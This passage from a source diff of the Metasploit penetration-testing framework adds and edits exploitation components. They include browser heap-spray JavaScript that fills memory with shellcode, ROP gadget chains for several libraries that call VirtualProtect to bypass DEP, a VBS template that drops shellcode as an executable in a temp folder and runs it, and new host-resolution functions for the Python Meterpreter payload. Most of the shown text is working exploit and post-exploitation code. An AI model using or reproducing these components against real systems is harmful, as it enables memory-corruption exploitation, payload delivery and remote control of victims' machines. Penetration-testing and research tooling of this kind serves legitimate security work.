+      if (i == 0) { buf += shellcode;       }
+      else        { buf += ";" + shellcode; }
+    }
+    else {
+      buf += ";#W00TA";
+    }
+  }
+
+  var e = document.getElementById(objId);
+  if (e == null) {
+    var eleId = "W00TB"
+    var acTag = "<t:ANIMATECOLOR id='"+ eleId  + "'/>"
+    document.body.innerHTML = document.body.innerHTML + acTag;
+    e = document.getElementById(eleId);
+  }
+  try { e.values = buf; }
+  catch (e) {}
+}

data/js/memory/property_spray.js

@@ -0,0 +1,38 @@
+var sym_div_container;
+function sprayHeap( oArg ) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var maxAllocs     = oArg.maxAllocs;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
+  if (offset        == undefined)  { offset        = 0x00; }
+  if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
+  if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
+
+  if (offset > 0x800) { throw "Bad alignment"; }
+
+  sym_div_container = document.getElementById(objId);
+
+  if (sym_div_container == null) {
+    sym_div_container = document.createElement("div");
+  }
+
+  sym_div_container.style.cssText = "display:none";
+  var data;
+  junk = unescape("%u2020%u2020");
+  while (junk.length < offset+0x1000) junk += junk;
+
+  data = junk.substring(0,offset) + shellcode;
+  data += junk.substring(0,0x800-offset-shellcode.length);
+
+  while (data.length < heapBlockSize) data += data;
+
+  for (var i = 0; i < maxAllocs; i++)
+  {
+    var obj = document.createElement("button");
+    obj.title = data.substring(0, (heapBlockSize-2)/2);
+    sym_div_container.appendChild(obj);
+  }
+}

data/js/network/ajax_download.js

@@ -0,0 +1,18 @@
+function ajax_download(oArg) {
+  if (!oArg.method) { oArg.method = "GET"; }
+  if (!oArg.path)   { throw "Missing parameter 'path'"; }
+  if (!oArg.data)   { oArg.data = null; }
+
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open(oArg.method, oArg.path, false);
+  xmlHttp.send(oArg.data);
+  if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+    return xmlHttp.responseText;
+  }
+  return null;
+}

data/js/network/ajax_post.js

@@ -0,0 +1,10 @@
+function postInfo(path, data) {
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open('POST', path, false);
+  xmlHttp.send(data);
+}

data/js/network/xhr_shim.js

@@ -0,0 +1,15 @@
+if (!window.XMLHTTPRequest) {
+  (function() {
+    var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
+    for (idx = 0; idx < activeObjs.length; idx++) {
+      try {
+        new ActiveXObject(activeObjs[idx]);
+        window.XMLHttpRequest = function() {
+          return new ActiveXObject(activeObjs[idx]);
+        };
+        break;
+      }
+      catch (e) {}
+    }
+  })();
+}

data/js/utils/base64.js

@@ -0,0 +1,126 @@
+// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
+// variable names changed to make obfuscation easier
+var Base64 = {
+  // private property
+  _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+  // private method
+  _utf8_encode : function ( input ){
+    input = input.replace(/\r\n/g,"\\n");
+    var utftext = "";
+    var input_idx;
+
+    for (input_idx = 0; input_idx < input.length; input_idx++) {
+      var chr = input.charCodeAt(input_idx);
+      if (chr < 128) {
+        utftext += String.fromCharCode(chr);
+      }
+      else if((chr > 127) && (chr < 2048)) {
+        utftext += String.fromCharCode((chr >> 6) | 192);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      } else {
+        utftext += String.fromCharCode((chr >> 12) | 224);
+        utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      }
+    }
+
+    return utftext;
+  },
+
+  // public method for encoding
+  encode : function( input ) {
+    var output = "";
+    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
+    var input_idx = 0;
+
+    input = Base64._utf8_encode(input);
+
+    while (input_idx < input.length) {
+      chr1 = input.charCodeAt( input_idx++ );
+      chr2 = input.charCodeAt( input_idx++ );
+      chr3 = input.charCodeAt( input_idx++ );
+
+      enc1 = chr1 >> 2;
+      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
+      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
+      enc4 = chr3 & 63;
+
+      if (isNaN(chr2)) {
+        enc3 = enc4 = 64;
+      } else if (isNaN(chr3)) {
+        enc4 = 64;
+      }
+      output = output +
+      this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
+      this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
+    }
+    return output;
+  },
+  // public method for decoding
+  decode : function (input) {
+    var output = "";
+    var chr1, chr2, chr3;
+    var enc1, enc2, enc3, enc4;
+    var i = 0;
+
+    input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
+
+    while (i < input.length) {
+
+      enc1 = this._keyStr.indexOf(input.charAt(i++));
+      enc2 = this._keyStr.indexOf(input.charAt(i++));
+      enc3 = this._keyStr.indexOf(input.charAt(i++));
+      enc4 = this._keyStr.indexOf(input.charAt(i++));
+
+      chr1 = (enc1 << 2) | (enc2 >> 4);
+      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+      chr3 = ((enc3 & 3) << 6) | enc4;
+
+      output = output + String.fromCharCode(chr1);
+
+      if (enc3 != 64) {
+        output = output + String.fromCharCode(chr2);
+      }
+      if (enc4 != 64) {
+        output = output + String.fromCharCode(chr3);
+      }
+
+    }
+
+    output = Base64._utf8_decode(output);
+
+    return output;
+
+  },
+  _utf8_decode : function (utftext) {
+    var string = "";
+    var input_idx = 0;
+    var chr1 = 0;
+    var chr2 = 0;
+    var chr3 = 0;
+
+    while ( input_idx < utftext.length ) {
+
+      chr1 = utftext.charCodeAt(input_idx);
+
+      if (chr1 < 128) {
+        string += String.fromCharCode(chr1);
+        input_idx++;
+      }
+      else if((chr1 > 191) && (chr1 < 224)) {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
+        input_idx += 2;
+      } else {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        chr3 = utftext.charCodeAt(input_idx+2);
+        string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
+        input_idx += 3;
+      }
+    }
+
+    return string;
+  }
+
+};

data/meterpreter/ext_server_stdapi.py

@@ -149,6 +149,8 @@ TLV_TYPE_NETWORK_INTERFACE =   TLV_META_TYPE_GROUP   | 1433
 TLV_TYPE_SUBNET_STRING =       TLV_META_TYPE_STRING  | 1440
 TLV_TYPE_NETMASK_STRING =      TLV_META_TYPE_STRING  | 1441
 TLV_TYPE_GATEWAY_STRING =      TLV_META_TYPE_STRING  | 1442
+TLV_TYPE_ROUTE_METRIC =        TLV_META_TYPE_UINT    | 1443
+TLV_TYPE_ADDR_TYPE =           TLV_META_TYPE_UINT    | 1444
 
 # Socket
 TLV_TYPE_PEER_HOST =           TLV_META_TYPE_STRING  | 1500
@@ -273,6 +275,9 @@ ERROR_FAILURE = 1
 # errors.
 ERROR_CONNECTION_ERROR = 10000
 
+WIN_AF_INET  = 2
+WIN_AF_INET6 = 23
+
 def get_stat_buffer(path):
 	si = os.stat(path)
 	rdev = 0
@@ -290,6 +295,27 @@ def get_stat_buffer(path):
 	st_buf += struct.pack('<II', blksize, blocks)
 	return st_buf
 
+def inet_pton(family, address):
+	if hasattr(socket, 'inet_pton'):
+		return socket.inet_pton(family, address)
+	elif has_windll:
+		WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
+		lpAddress = (ctypes.c_ubyte * 28)()
+		lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
+		if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
+			raise Exception('WSAStringToAddress failed')
+		if family == socket.AF_INET:
+			return ''.join(map(chr, lpAddress[4:8]))
+		elif family == socket.AF_INET6:
+			return ''.join(map(chr, lpAddress[8:24]))
+	raise Exception('no suitable inet_pton functionality is available')
+
+def resolve_host(hostname, family):
+	address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
+	family = address_info[0]
+	address = address_info[4][0]
+	return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
+
 def windll_GetNativeSystemInfo():
 	if not has_windll:
 		return None
@@ -687,6 +713,40 @@ def stdapi_fs_stat(request, response):
 	response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
 	return ERROR_SUCCESS, response
 
+@meterpreter.register_function
+def stdapi_net_resolve_host(request, response):
+	hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
+	family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
+	if family == WIN_AF_INET:
+		family = socket.AF_INET
+	elif family == WIN_AF_INET6:
+		family = socket.AF_INET6
+	else:
+		raise Exception('invalid family')
+	result = resolve_host(hostname, family)
+	response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
+	response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_net_resolve_hosts(request, response):
+	family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
+	if family == WIN_AF_INET:
+		family = socket.AF_INET
+	elif family == WIN_AF_INET6:
+		family = socket.AF_INET6
+	else:
+		raise Exception('invalid family')
+	for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
+		hostname = hostname['value']
+		try:
+			result = resolve_host(hostname, family)
+		except socket.error:
+			result = {'family':family, 'packed_address':''}
+		response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
+		response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
+	return ERROR_SUCCESS, response
+
 @meterpreter.register_function
 def stdapi_net_socket_tcp_shutdown(request, response):
 	channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
@@ -842,9 +902,12 @@ def stdapi_registry_query_value(request, response):
 		if value_type.value == REG_SZ:
 			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
 		elif value_type.value == REG_DWORD:
-			response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4])
+			value = value_data[:4]
+			value.reverse()
+			value = ''.join(map(chr, value))
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
 		else:
-			response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value])
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
 		return ERROR_SUCCESS, response
 	return ERROR_FAILURE, response
 

data/meterpreter/meterpreter.py

@@ -111,6 +111,24 @@ def packet_get_tlv(pkt, tlv_type):
 		offset += tlv[0]
 	return {}
 
+def packet_enum_tlvs(pkt, tlv_type = None):
+	offset = 0
+	while (offset < len(pkt)):
+		tlv = struct.unpack('>II', pkt[offset:offset+8])
+		if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
+			val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
+			if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
+				val = val.split('\x00', 1)[0]
+			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
+				val = struct.unpack('>I', val)[0]
+			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
+				val = bool(struct.unpack('b', val)[0])
+			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
+				pass
+			yield {'type':tlv[1], 'length':tlv[0], 'value':val}
+		offset += tlv[0]
+	raise StopIteration()
+
 def tlv_pack(*args):
 	if len(args) == 2:
 		tlv = {'type':args[0], 'value':args[1]}
@@ -271,7 +289,7 @@ class PythonMeterpreter(object):
 		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
 			return ERROR_FAILURE
 		preloadlib_methods = self.extension_functions.keys()
-		i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
+		i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
 		i.runcode(compile(data_tlv['value'], '', 'exec'))
 		postloadlib_methods = self.extension_functions.keys()
 		new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)

data/ropdb/hxds.xml

@@ -0,0 +1,66 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>2007</target>
+	</compatibility>
+
+	<gadgets base="0x51bd0000">
+		<gadget offset="0x000750fd">POP EAX # RETN</gadget>
+		<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0001803c">POP EBP # RETN</gadget>
+		<gadget offset="0x0001803c">skip 4 bytes</gadget>
+		<gadget offset="0x0001750f">POP EBX # RETN</gadget>
+		<gadget value="safe_negate_size">Safe size to NEG</gadget>
+		<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
+		<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
+		<gadget value="ffffffc0">0x00000040</gadget>
+		<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
+		<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x000406e9">POP ECX # RETN</gadget>
+		<gadget offset="0x0008bfae">Writable location</gadget>
+		<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
+		<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
+		<gadget offset="0x0002c840">JMP [EAX]</gadget>
+		<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
+		<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>2010</target>
+	</compatibility>
+
+	<gadgets base="0x51bd0000">
+		<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
+		<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
+		<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
+		<gadget value="safe_negate_size">Safe size to NEG</gadget>
+		<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0002a429">POP EDX # RETN</gadget>
+		<gadget value="ffffffc0">0x00000040</gadget>
+		<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
+		<gadget offset="0x0008c638">Writable location</gadget>
+		<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
+		<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
+		<gadget offset="0x00073335">POP ESI # RETN</gadget>
+		<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
+		<gadget offset="0x00076452">POP EAX # RETN</gadget>
+		<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
+		<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
+</gadgets>
+</rop>
+</db>

data/ropdb/java.xml

@@ -9,7 +9,7 @@
 		<gadget offset="0x00024c66">POP EBP # RETN</gadget>
 		<gadget offset="0x00024c66">skip 4 bytes</gadget>
 		<gadget offset="0x00004edc">POP EAX # RETN</gadget>
-		<gadget value="FFFFFBFF">0x00000201</gadget>
+		<gadget value="safe_negate_size">0x00000201</gadget>
 		<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
 		<gadget offset="0x000136e3">POP EBX # RETN</gadget>
 		<gadget value="0xffffffff"></gadget>

data/ropdb/msvcrt.xml

@@ -7,12 +7,21 @@
 	</compatibility>
 
 	<gadgets base="0x77c10000">
+		<gadget offset="0x0002b860">POP EAX # RETN</gadget>
+		<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
+		<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x0001362c">POP EBX # RETN</gadget>
+		<gadget offset="0x0004d9bb">Writable location</gadget>
+		<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
+		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
+		<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
+		<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
 		<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
 		<gadget offset="0x0002ee15">skip 4 bytes</gadget>
-		<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
-		<gadget value="0x00000400">0x00000400-> ebx</gadget>
-		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
-		<gadget value="0x00000040">0x00000040-> edx</gadget>
 		<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
 		<gadget offset="0x0004d9bb">Writable location</gadget>
 		<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
@@ -33,23 +42,29 @@
 	</compatibility>
 
 	<gadgets base="0x77ba0000">
-		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
-		<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00001114">VirtualProtect()</gadget>
 		<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
-		<gadget value="junk">Filler</gadget>
+		<gadget value="junk">JUNK</gadget>
 		<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
-		<gadget offset="0x00026320">POP EBP # RETN</gadget>
+		<gadget offset="0x00029801">POP EBP # RETN</gadget>
-		<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
+		<gadget offset="0x00042265">ptr to 'push esp #  ret'</gadget>
-		<gadget offset="0x000385b7">POP EBX # RETN</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
-		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget value="0x03C0990F">EAX</gadget>
-		<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
+		<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
-		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x000148d3">POP EBX, RET</gadget>
-		<gadget offset="0x000330fb">POP ECX # RETN</gadget>
+		<gadget offset="0x000521e0">.data</gadget>
-		<gadget offset="0x0004ff56">Writable location</gadget>
+		<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
-		<gadget offset="0x00038a92">POP EDI # RETN</gadget>
+		<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
-		<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
-		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
+		<gadget offset="0x00038c04">POP EDI # RETN</gadget>
-		<gadget value="nop">nop</gadget>
+		<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="0x03C0944F">EAX</gadget>
+		<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
+		<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="nop">NOP</gadget>
 		<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
 	</gadgets>
 </rop>

data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238

@@ -1,13 +0,0 @@
-K 10
-ascii_cert
-V 1844
-MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
-K 8
-failures
-V 1
-8
-K 15
-svn:realmstring
-V 26
-https://metasploit.com:443
-END

data/svn/auth/svn.ssl.server/ae6796767fe833f43e1aac5614a3f229

@@ -1,13 +0,0 @@
-K 10
-ascii_cert
-V 1844
-MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
-K 8
-failures
-V 1
-8
-K 15
-svn:realmstring
-V 30
-https://www.metasploit.com:443
-END

data/templates/scripts/to_exe.vbs.template

@@ -1,5 +1,5 @@
 Function %{var_func}()
-%{var_shellcode}
+	%{var_shellcode} = "%{hex_shellcode}"
 
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
@@ -10,9 +10,11 @@ Function %{var_func}()
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
-	%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
 	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
-	%{var_stream}.Write %{var_bytes}
+	For i = 1 to Len(%{var_shellcode}) Step 2
+	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
+	Next
 	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")

data/templates/scripts/to_mem.aspx.template

@@ -0,0 +1,21 @@
+<%%@ Page Language="C#" AutoEventWireup="true" %%>
